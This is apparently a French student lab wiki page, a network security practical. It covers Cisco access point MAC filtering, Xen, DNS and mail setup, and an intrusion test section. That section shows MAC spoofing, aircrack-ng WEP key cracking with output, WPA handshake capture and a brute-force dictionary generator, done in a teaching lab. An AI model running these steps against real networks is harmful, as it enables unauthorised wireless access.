&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du point d’accès Cisco &amp;lt;/h3&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du Wifi sur l'eeePC&amp;lt;/h3&amp;gt;&lt;br /&gt;
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.&lt;br /&gt;
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. &lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Installation des systèmes d'exploitation &amp;lt;/h1&amp;gt;&lt;br /&gt;
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.&lt;br /&gt;
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.&lt;br /&gt;
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. &lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h2&amp;gt;Installation de la machine virtuel&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie concerne l’installation du machine virtuel Xen.&lt;br /&gt;
Nous installons Xen car celui-ci permet de faire de la  paravirtualisation. &lt;br /&gt;
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps &lt;br /&gt;
&lt;br /&gt;
Les étapes a suivre pour l’installation de Xen sur cordouan:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration de Xen:&lt;br /&gt;
- On autorise les connexion ssh en root&lt;br /&gt;
- On retire Network Manger pour configurer la connexion au réseau manuellement &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage systemd &lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@chien:~# apt-get install vim strace tcpdump &lt;br /&gt;
root@chien:~# apt-get install host&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Services Internet &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Serveur DNS&amp;lt;/h2&amp;gt;&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cat /etc/bind/named.conf.options &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
host -t ni love-in-the-world.space&lt;br /&gt;
host -t any love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
cat db.love-in-the-world &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
cat /var/log/daemon.log&lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
service bind9 stop&lt;br /&gt;
service bind9 start&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Recuperation du certificat SSL&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur &lt;br /&gt;
&lt;br /&gt;
Instalation et Configuration de la boite Mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  apt-get install postfix bsd-mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
configuration de la boite mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #nano /etc/aliases&lt;br /&gt;
   postmaster:    root&lt;br /&gt;
   admin: root&lt;br /&gt;
 &lt;br /&gt;
 #newaliases&lt;br /&gt;
 #mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail &lt;br /&gt;
E-mail: admin@love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
Verfification:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#mailx&lt;br /&gt;
From Maxime.Strunc@polytech-lille.net  Fri Nov 20 13:22:24 2015&lt;br /&gt;
Return-Path: &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Original-To: admin@love-in-the-world.space&lt;br /&gt;
Delivered-To: admin@love-in-the-world.space&lt;br /&gt;
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])&lt;br /&gt;
	by chien (Postfix) with ESMTP id E7DA93421F&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 13:22:24 +0100 (CET)&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])&lt;br /&gt;
	(Authenticated sender: mstrunc)&lt;br /&gt;
	by peronne.escaut.net (Postfix) with ESMTPA id 305081C38&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 11:33:52 +0100 (CET)&lt;br /&gt;
MIME-Version: 1.0&lt;br /&gt;
Content-Type: text/plain; charset=UTF-8;&lt;br /&gt;
 format=flowed&lt;br /&gt;
Content-Transfer-Encoding: 7bit&lt;br /&gt;
Date: Fri, 20 Nov 2015 11:33:52 +0100&lt;br /&gt;
From: Maxime Strunc &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
To: &amp;lt;admin@love-in-the-world.space&amp;gt;&lt;br /&gt;
Subject: Hello&lt;br /&gt;
Message-ID: &amp;lt;478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Sender: Maxime.Strunc@polytech-lille.net&lt;br /&gt;
User-Agent: Roundcube Webmail/0.7.2&lt;br /&gt;
Status: RO&lt;br /&gt;
&lt;br /&gt;
Hey it's working&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
- Recupération du Certificat:&lt;br /&gt;
Je vais sur Gandi.net&lt;br /&gt;
&lt;br /&gt;
génération de la CSR&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@chien:~#   openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr&lt;br /&gt;
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : &lt;br /&gt;
admin@love-in-the-world.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres avoir renseigner tout les champs, &lt;br /&gt;
j'obtient la CSR: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
       ... texte crypter...&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Je la copie dans l'emplacement voulue sur gandi.net&lt;br /&gt;
&lt;br /&gt;
Gandi m'envoi un mail a l'adresse informée &amp;quot;admin@love-in-the-world.space&amp;quot;&lt;br /&gt;
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.&lt;br /&gt;
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt&lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h1&amp;gt;Test d'intrusion &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci.  &lt;br /&gt;
&lt;br /&gt;
Changement d'adresse MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On change la cles par: 0000000000&lt;br /&gt;
et le SSID : T1&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key 0000000000&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Préparation aux cassage de clés&amp;lt;/h2&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install aircrack-ng firmware ralink&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install firmware ralink&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WEP &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je scan le reseaux Wifi: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J’identifie le ssid de cracotte06 et je met les donnée  dans un fichier nommé fcracotte06&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w&lt;br /&gt;
fcracotte06&lt;br /&gt;
&lt;br /&gt;
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La capture a donc commencé &lt;br /&gt;
&lt;br /&gt;
Dans un autre terminal:&lt;br /&gt;
Je vais analyser mon fichier de capture pour casser la cles.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ls&lt;br /&gt;
aircrack-ng fcracotte06-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres quelque minutes on obtient la cles &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                 [00:06:58] Tested 965565 keys (got 60459 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) &lt;br /&gt;
    1    0/  1   AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) &lt;br /&gt;
    2    0/  1   AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) &lt;br /&gt;
    3    4/  5   AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) &lt;br /&gt;
    4    0/  1   AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) &lt;br /&gt;
    5    0/  1   AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) &lt;br /&gt;
    6    0/  1   AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) &lt;br /&gt;
    7    0/  1   AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) &lt;br /&gt;
    8    0/  1   AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) &lt;br /&gt;
    9    0/  3   D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) &lt;br /&gt;
   10    0/  1   5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) &lt;br /&gt;
   11   13/  1   48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) &lt;br /&gt;
   12    0/  1   BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WPA&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie consiste a casser une clés WPA par force brute.&lt;br /&gt;
Je m'interesse plus particulierement a caracotte06 comme précédament.&lt;br /&gt;
 &lt;br /&gt;
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake.   &lt;br /&gt;
&lt;br /&gt;
Recuperation du Handshake: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06&lt;br /&gt;
&lt;br /&gt;
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
creation d'un dictionaire :&lt;br /&gt;
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.&lt;br /&gt;
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
int main ()&lt;br /&gt;
{&lt;br /&gt;
int val=0;&lt;br /&gt;
for(val=0;val&amp;lt;99999999 ;val++)&lt;br /&gt;
{printf(&amp;quot;%08d\n&amp;quot;,val); }&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Compilation :&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
gcc -Wall Dictionnaire.c -o Dictionnaire&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création :&lt;br /&gt;
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
./Dictionnaire &amp;gt; Dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Cassage de la cles: &lt;br /&gt;
après avoir récuperer le Handshake du Wifi carotte06&lt;br /&gt;
Je vais casser la clés en utilisant mon dictionnaire &amp;quot;Dico&amp;quot; le fichier &amp;quot;wpacracotte06-02.cap&amp;quot;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23131</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23131"/>
				<updated>2015-11-22T18:07:43Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;head&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;head /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h1&amp;gt;Configuration du point d’accès&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Restriction par adresse MAC &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
